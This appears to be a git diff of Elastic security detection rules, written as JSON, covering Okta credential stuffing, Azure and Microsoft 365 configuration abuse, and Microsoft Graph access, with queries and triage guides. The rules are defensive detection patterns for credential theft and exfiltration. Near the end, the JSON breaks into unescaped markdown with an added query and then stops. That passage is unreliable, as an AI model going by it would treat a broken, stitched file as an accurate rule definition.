Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- 
Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.debug_context.debug_data.request_uri == \"/api/v1/authn\"\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP event.action, okta.debug_context.debug_data.dt_hash, okta.client.ip, okta.actor.alternate_id, okta.debug_context.debug_data.request_uri, okta.outcome.reason\n| STATS\n source_auth_count = COUNT_DISTINCT(okta.debug_context.debug_data.dt_hash)\n BY okta.client.ip, okta.actor.alternate_id\n| WHERE\n source_auth_count >= 30\n| SORT\n source_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "23f18264-2d6d-11ef-9413-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git 
a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json index 2cc3f6277de..9bd34a30522 100644 --- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json deleted file mode 100644 index 3d882d715c6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_103.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously.", - "false_positives": [ - "Access level modifications may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Access level modifications from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Blob Container Access Level Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Blob Container Access Level Modification\n\nAzure Blob Storage is a service for storing large amounts of unstructured data, where access levels can be configured to control data visibility. Adversaries may exploit misconfigured access levels to gain unauthorized access to sensitive data. 
The detection rule monitors changes in container access settings, focusing on successful modifications, to identify potential security risks associated with unauthorized access level changes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific storage account and container where the access level modification occurred, using the operation name \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\".\n- Verify the identity of the user or service principal that performed the modification by examining the associated user information in the activity logs.\n- Check the timestamp of the modification to determine if it aligns with any known maintenance windows or authorized changes.\n- Investigate the previous access level settings of the container to assess the potential impact of the change, especially if it involved enabling anonymous public read access.\n- Correlate the event with any other recent suspicious activities or alerts in the Azure environment to identify potential patterns or coordinated actions.\n- Contact the owner of the storage account or relevant stakeholders to confirm whether the change was authorized and aligns with organizational policies.\n\n### False positive analysis\n\n- Routine administrative changes to container access levels by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that regularly perform these tasks.\n- Automated scripts or tools used for managing storage configurations may cause false positives. Identify and exclude these scripts or tools from monitoring if they are verified as non-threatening.\n- Scheduled updates or maintenance activities that involve access level modifications can be mistaken for unauthorized changes. Document and schedule these activities to align with monitoring rules, allowing for temporary exclusions during these periods.\n- Changes made by trusted third-party services integrated with Azure Blob Storage might be flagged. 
Verify these services and exclude their operations from triggering alerts if they are deemed secure and necessary for business operations.\n\n### Response and remediation\n\n- Immediately revoke public read access to the affected Azure Blob container to prevent unauthorized data exposure.\n- Review the access logs to identify any unauthorized access or data exfiltration attempts during the period when the access level was modified.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized access level change and any potential data exposure.\n- Conduct a thorough audit of all Azure Blob containers to ensure that access levels are configured according to the organization's security policies and that no other containers are misconfigured.\n- Implement additional monitoring and alerting for changes to access levels on Azure Blob containers to ensure rapid detection of any future unauthorized modifications.\n- If sensitive data was exposed, initiate a data breach response plan, including notifying affected parties and regulatory bodies as required by law.\n- Review and update access management policies and procedures to prevent recurrence, ensuring that only authorized personnel can modify container access levels.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Asset Visibility", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1526", - "name": "Cloud Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1526/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1190", - "name": "Exploit Public-Facing Application", - "reference": "https://attack.mitre.org/techniques/T1190/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json deleted file mode 100644 index cb898fd3c41..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory High Risk User Sign-in Heuristic", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk User Sign-in Heuristic\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised` or `atRisk`.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user.\n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.risk_state:(\"confirmedCompromised\" or \"atRisk\") and event.outcome:(success or Success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_state", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "26edba02-6979-4bce-920a-70b080a7be81", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "26edba02-6979-4bce-920a-70b080a7be81_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json index e6e1723dffe..fcbe579c280 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_414.json @@ -23,6 +23,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json 
b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json deleted file mode 100644 index 1275b0e32fa..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_207.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", - "false_positives": [ - "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Transport Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Transport Rule Modification\n\nMicrosoft 365 Exchange transport rules manage email flow by setting conditions and actions for messages. Adversaries may exploit these rules to disable or delete them, facilitating data exfiltration or bypassing security measures. The detection rule monitors audit logs for successful execution of commands that alter these rules, signaling potential misuse and enabling timely investigation.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the \"Remove-TransportRule\" or \"Disable-TransportRule\" actions.\n- Identify the user account associated with the event by examining the user information in the audit logs to determine if the action was performed by an authorized individual or a potential adversary.\n- Check the event.category:web context to understand if the action was performed through a web interface, which might indicate a compromised account or unauthorized access.\n- Investigate the event.outcome:success to ensure that the rule modification was indeed successful and not an attempted action.\n- Correlate the timing of the rule modification with other security events or alerts to identify any concurrent suspicious activities that might suggest a broader attack or data exfiltration attempt.\n- Assess the impact of the rule modification by reviewing the affected transport rules to determine if they were critical for security or compliance, and evaluate the potential risk to the organization.\n\n### False positive analysis\n\n- Routine administrative changes to transport rules by IT staff can trigger alerts. To manage this, maintain a list of authorized personnel and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled maintenance or updates to transport rules may result in false positives. 
Document these activities and adjust the monitoring system to temporarily exclude these events during known maintenance windows.\n- Automated scripts or third-party tools that manage transport rules might cause alerts. Identify these tools and their typical behavior, then configure the monitoring system to recognize and exclude these benign actions.\n- Changes made as part of compliance audits or security assessments can be mistaken for malicious activity. Coordinate with audit teams to log these activities separately and adjust the monitoring system to account for these legitimate changes.\n\n### Response and remediation\n\n- Immediately disable any compromised accounts identified in the audit logs to prevent further unauthorized modifications to transport rules.\n- Revert any unauthorized changes to transport rules by restoring them to their previous configurations using backup data or logs.\n- Conduct a thorough review of all transport rules to ensure no additional unauthorized modifications have been made, and confirm that all rules align with organizational security policies.\n- Implement additional monitoring on the affected accounts and transport rules to detect any further suspicious activities or attempts to modify rules.\n- Escalate the incident to the security operations team for a deeper investigation into potential data exfiltration activities and to assess the scope of the breach.\n- Coordinate with legal and compliance teams to determine if any regulatory reporting is required due to potential data exfiltration.\n- Enhance security measures by enabling multi-factor authentication (MFA) for all administrative accounts and reviewing access permissions to ensure the principle of least privilege is enforced.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - 
}, - "id": "272a6484-2663-46db-a532-ef734bf9a796_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json deleted file mode 100644 index 89fc15beb2e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", - "false_positives": [ - "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams External Access Enabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams External Access Enabled\n\nMicrosoft Teams' external access feature allows users to communicate with individuals outside their organization, facilitating collaboration. However, adversaries can exploit this by enabling external access or adding trusted domains to exfiltrate data or maintain persistence. The detection rule monitors audit logs for changes in federation settings, specifically when external access is successfully enabled, indicating potential misuse.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Set-CsTenantFederationConfiguration\" to identify when and by whom the external access was enabled.\n- Examine the o365.audit.Parameters.AllowFederatedUsers field to confirm that it is set to True, indicating that external access was indeed enabled.\n- Investigate the user account associated with the event to determine if the action was authorized and if the account has a history of suspicious activity.\n- Check the event.provider field to see if the change was made through SkypeForBusiness or MicrosoftTeams, which may provide additional context on the method used.\n- Assess the event.outcome field to ensure the action was successful and not a failed attempt, which could indicate a potential security threat.\n- Look into any recent changes in the list of allowed domains to identify if any unauthorized or suspicious domains have been added.\n\n### False positive analysis\n\n- Routine administrative changes to federation settings can trigger alerts. Regularly review and document these changes to differentiate between legitimate and suspicious activities.\n- Organizations with frequent collaboration with external partners may see increased alerts. 
Consider creating exceptions for known trusted domains to reduce noise.\n- Scheduled updates or policy changes by IT teams might enable external access temporarily. Coordinate with IT to log these activities and exclude them from triggering alerts.\n- Automated scripts or tools used for configuration management can inadvertently enable external access. Ensure these tools are properly documented and monitored to prevent false positives.\n- Changes made during mergers or acquisitions can appear suspicious. Maintain a record of such events and adjust monitoring rules accordingly to account for expected changes.\n\n### Response and remediation\n\n- Immediately disable external access in Microsoft Teams to prevent further unauthorized communication with external domains.\n- Review and remove any unauthorized or suspicious domains added to the allowed list in the Teams federation settings.\n- Conduct a thorough audit of recent changes in the Teams configuration to identify any other unauthorized modifications or suspicious activities.\n- Reset credentials and enforce multi-factor authentication for accounts involved in the configuration change to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of data exfiltration or if the scope of the breach is unclear.\n- Implement enhanced monitoring and alerting for changes in Teams federation settings to detect similar threats in the future.", - "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.AllowFederatedUsers", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json 
b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json deleted file mode 100644 index 6650d10ea1b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may help identify unauthorized access or actions performed by compromised accounts. Adversaries may successfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user.", - "false_positives": [ - "Users legitimately accessing Microsoft Graph API using the specified client application ID and tenant ID. This may include authorized applications or services that interact with Microsoft Graph on behalf of users.", - "Authorized third-party applications or services that use the specified client application ID to access Microsoft Graph API resources for legitimate purposes.", - "Administrative or automated tasks that involve accessing Microsoft Graph API using the specified client application ID and tenant ID, such as provisioning or managing resources." - ], - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure.graphactivitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft Graph First Occurrence of Client Request", - "new_terms_fields": [ - "azure.graphactivitylogs.properties.app_id", - "azure.graphactivitylogs.properties.user_principal_object_id", - "azure.tenant_id" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft Graph First Occurrence of Client Request\n\nThis rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within the last 14 days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows.\n\nAdversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access.
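As a rough companion to this New Terms rule, a hedged ES|QL sketch such as the one below surfaces the earliest and latest Graph requests per application, principal, and tenant; the index pattern and field names are taken from the rule itself, and the lookback simply depends on your retention.

```esql
// First and last observed Microsoft Graph requests per app / principal / tenant,
// approximating the combination the New Terms rule keys on.
FROM logs-azure.graphactivitylogs-*
| WHERE event.dataset == "azure.graphactivitylogs"
  AND event.type == "access"
  AND azure.graphactivitylogs.properties.c_idtyp == "user"
| STATS
    first_seen = MIN(@timestamp),
    last_seen = MAX(@timestamp),
    request_count = COUNT(*)
  BY azure.graphactivitylogs.properties.app_id,
     azure.graphactivitylogs.properties.user_principal_object_id,
     azure.tenant_id
| SORT first_seen DESC
```

A recent `first_seen` for an unfamiliar `app_id` against a sensitive principal is the kind of pairing the investigation steps below pivot on.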
